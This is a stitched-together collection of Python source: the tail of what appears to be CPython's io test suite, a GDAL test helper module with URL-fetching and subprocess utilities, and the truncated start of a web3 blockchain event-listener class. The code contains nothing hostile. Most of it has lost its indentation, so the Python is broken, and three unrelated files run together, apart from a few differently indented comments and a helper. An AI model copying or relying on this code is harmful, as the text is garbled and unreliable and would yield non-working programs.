# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
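# Example of the truncation above (hypothetical sizes): for a 10-byte buf
# on a platform where array('i').itemsize == 4, idx is 8, so the returned
# memoryview exposes two ints / 8 bytes and the trailing 2 bytes of buf
# are dropped.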
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with support.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
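# (Sketch of the distinction, assuming POSIX pipe semantics: a non-blocking
# raw write of <= PIPE_BUF bytes is atomic -- all or nothing -- so with the
# 1024-byte buffer a flush never writes only part of the buffer, while the
# 16 KiB buffer can be partially written.)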
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
gdaltest_python3.py
|
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Python Library supporting GDAL/OGR Test Suite
# Author: Even Rouault, <even dot rouault at spatialys.com>
#
###############################################################################
# Copyright (c) 2003, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2009-2013, Even Rouault <even dot rouault at spatialys.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import urllib.request
import urllib.error
import urllib.parse
import socket
import subprocess
import shlex
import os
import sys
from queue import Queue
from threading import Thread
def run_func(func):
try:
result = func()
print(result)
return result
except SystemExit as x:
import traceback
traceback.print_exc()
raise x
except Exception:
# We really do want to catch most exceptions percolating up to here
# pylint: disable=broad-except
result = 'fail (blowup)'
print(result)
import traceback
traceback.print_exc()
return result
def urlescape(url):
    # Escape any non-ASCII characters
    return urllib.parse.quote(url)
def gdalurlopen(url, timeout=10):
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
proxy = None
if 'GDAL_HTTP_PROXY' in os.environ:
proxy = os.environ['GDAL_HTTP_PROXY']
protocol = 'http'
if 'GDAL_HTTPS_PROXY' in os.environ and url.startswith('https'):
proxy = os.environ['GDAL_HTTPS_PROXY']
protocol = 'https'
if proxy is not None:
if 'GDAL_HTTP_PROXYUSERPWD' in os.environ:
proxyuserpwd = os.environ['GDAL_HTTP_PROXYUSERPWD']
proxyHandler = urllib.request.ProxyHandler({"%s" % protocol:
"%s://%s@%s" % (protocol, proxyuserpwd, proxy)})
else:
proxyuserpwd = None
proxyHandler = urllib.request.ProxyHandler({"%s" % protocol:
"%s://%s" % (protocol, proxy)})
opener = urllib.request.build_opener(proxyHandler, urllib.request.HTTPHandler)
urllib.request.install_opener(opener)
try:
handle = urllib.request.urlopen(url)
socket.setdefaulttimeout(old_timeout)
return handle
except urllib.error.HTTPError as e:
print('HTTP service for %s is down (HTTP Error: %d)' % (url, e.code))
socket.setdefaulttimeout(old_timeout)
return None
except urllib.error.URLError as e:
print('HTTP service for %s is down (URL Error: %s)' % (url, e.reason))
socket.setdefaulttimeout(old_timeout)
return None
except urllib.error.ContentTooShort:
print('HTTP content too short for %s.' % url)
socket.setdefaulttimeout(old_timeout)
return None
def spawn_async(cmd):
command = shlex.split(cmd)
try:
process = subprocess.Popen(command, stdout=subprocess.PIPE)
return (process, process.stdout)
except OSError:
return (None, None)
def wait_process(process):
process.wait()
def runexternal(cmd, strin=None, check_memleak=True, display_live_on_parent_stdout=False, encoding='latin1'):
# pylint: disable=unused-argument
command = shlex.split(cmd)
if strin is None:
p = subprocess.Popen(command, stdout=subprocess.PIPE)
else:
p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
p.stdin.write(bytes(strin, 'ascii'))
p.stdin.close()
if p.stdout is not None:
if display_live_on_parent_stdout:
ret = ''
ret_stdout = p.stdout
while True:
c = ret_stdout.read(1).decode(encoding)
if c == '':
break
ret = ret + c
sys.stdout.write(c)
else:
ret = p.stdout.read().decode(encoding)
else:
ret = ''
waitcode = p.wait()
if waitcode != 0:
ret = ret + '\nERROR ret code = %d' % waitcode
return ret
def read_in_thread(f, q):
q.put(f.read())
f.close()
def runexternal_out_and_err(cmd, check_memleak=True, encoding='ascii'):
# pylint: disable=unused-argument
command = shlex.split(cmd)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.stdout is not None:
q_stdout = Queue()
t_stdout = Thread(target=read_in_thread, args=(p.stdout, q_stdout))
t_stdout.start()
else:
q_stdout = None
ret_stdout = ''
if p.stderr is not None:
q_stderr = Queue()
t_stderr = Thread(target=read_in_thread, args=(p.stderr, q_stderr))
t_stderr.start()
else:
q_stderr = None
ret_stderr = ''
if q_stdout is not None:
ret_stdout = q_stdout.get().decode(encoding)
if q_stderr is not None:
ret_stderr = q_stderr.get().decode(encoding)
waitcode = p.wait()
if waitcode != 0:
ret_stderr = ret_stderr + '\nERROR ret code = %d' % waitcode
return (ret_stdout, ret_stderr)
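# A minimal standalone sketch of the pattern used by runexternal_out_and_err()
# above: stdout and stderr are drained on worker threads so the parent never
# blocks on one pipe while the child fills the other. The command is only an
# illustrative example; this helper is not used by the test suite itself.
def _demo_out_and_err():
    cmd = [sys.executable, '-c',
           'import sys; print("to stdout"); print("to stderr", file=sys.stderr)']
    p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    q_stdout, q_stderr = Queue(), Queue()
    Thread(target=read_in_thread, args=(p.stdout, q_stdout)).start()
    Thread(target=read_in_thread, args=(p.stderr, q_stderr)).start()
    out = q_stdout.get().decode('ascii')
    err = q_stderr.get().decode('ascii')
    p.wait()
    return out, err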
|
root_event_listener.py
|
import time
import random
import json
import threading
from web3 import Web3, HTTPProvider
from hashlib import sha256
from hexbytes import HexBytes
from web3.utils.datastructures import AttributeDict
import pickle
class RootEventListener(object):
"""Listens to events on the root chain.
We abstract the logic for listening to events because
we only want events to be acted upon once they're considered
    finalized. Events can occasionally be missed, so we try to make
    event listening more robust.
    Args:
        root_chain (ConciseContract): A Web3 ConciseContract representing the root chain.
        w3 (Web3): A Web3 object.
